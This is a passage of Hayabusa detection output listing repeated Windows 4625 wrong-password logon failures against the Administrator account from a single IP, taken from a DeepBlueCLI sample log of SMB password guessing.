01:50:21.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YQx9PG8DtR2tMjvS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OoAWryajKhLD7RyY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PgewSeaVugP1TXss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sPMCPdCAnz4upz8X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:21.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dUbV6xnGeBWE8Dif : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dIJ9mZczFO1GKItV : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wW0vxE4o68L70Sra : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: upOn9DzB1yWtntyX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m9uGgocAVReiJWDm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qm9Jf1fles2HOb3g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ev5eTWdf3CskOMuh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:22.223 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QoiMO6sSLOm4fOD5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xDjvMsa2IgR9KO7l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SR7gVjxHZDYeK7pJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.323 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4jzGAepr7JeNKuuk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H9baxEeRCWjx6Fzr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.405 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uy7aTt0B4ErguacA : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nvKcLrUXqu2vTKO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PLycXLeAU21pdnXL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SgwjJSKOPnurDWW4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YPDYdxPoQAl8aGMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CX8knunlT6SMpmQw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:22.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AAjYbt50leZt3Xve : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3CD0HUCdg4UWOiji : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dkeWmTE1R1rYaYP8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W87qcfSj4qWWUv4k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WUCyUQgbUqwaLj3J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.877 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q9nLhDbcvmVBZp4f : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BBWo1zDdjaAeGDWW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:22.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vjHRFk2flmzzd1zg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 53HYxs9s7fpP1y6V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tluqXKvVooP7VNyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 43m0nfi5tiv4TpSB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:23.107 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qjPyJXl984vViV6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.143 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MomQ8Yt51VsMiO4p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LJYCi5r2otMHxA8f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4oUSkMBI8SGDLwYC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j1x3lyRjxn73KITB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.283 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gh05BhGpwq1ho62a : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bxj6ITbiciyRNLbF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uev2mjCaqHjm6NYi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.415 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L4WU383o9E5JyM5V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.450 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lfMv0lsoiRnTCFXe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XL4ahBqUyGeTONkE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:23.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8hJ888Kmyi6KqIPn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VZ6sfYMHuygnMdY2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XkuSlyTNc5OOoUtd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Z13YmupcMato8Sd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JedeMnLPnRJEwhZ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.810 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmy0c0wFheIRzSo4 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sskKdqku5S0f1sWm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:23.962 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 15Qg0nCXNj7Ub1Sj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZD6iuaqv70k69G87 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gk3UuqTJmvH1snmN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zaw9iF5mJlyygdnB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:24.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Sr5PZAd1qMc7hi3c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l5xbQtyueVq3fJSG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.203 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g2nP0zz2ofBxTGw6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SYJheREJmEwj0791 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: exglD9fnLwaqwRZn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8bSAU1QjasDAsmry : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cfnrtXR7evQBbaOw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.410 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KYAwjW99chcntPsQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rG2PYfOTfT7QvbPu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FojDtfDNXq0gQfYu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SUTT0QycbFtyJfNL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:50:24.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gcbv1lrcYdT9Wuli : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pjdFfvCCfGXo7FUf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rzqGdWlGglLQx6Z4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3Rt80PMk70sVqbk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: okunzcEHnxUml4SG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qH0AY3DeIryuHSiN : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.886 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DjqtxY5Fly4qAusS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PXHYu7wAqo7m6mZn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:24.990 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UaEM3boErBRrCbna : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:25.040 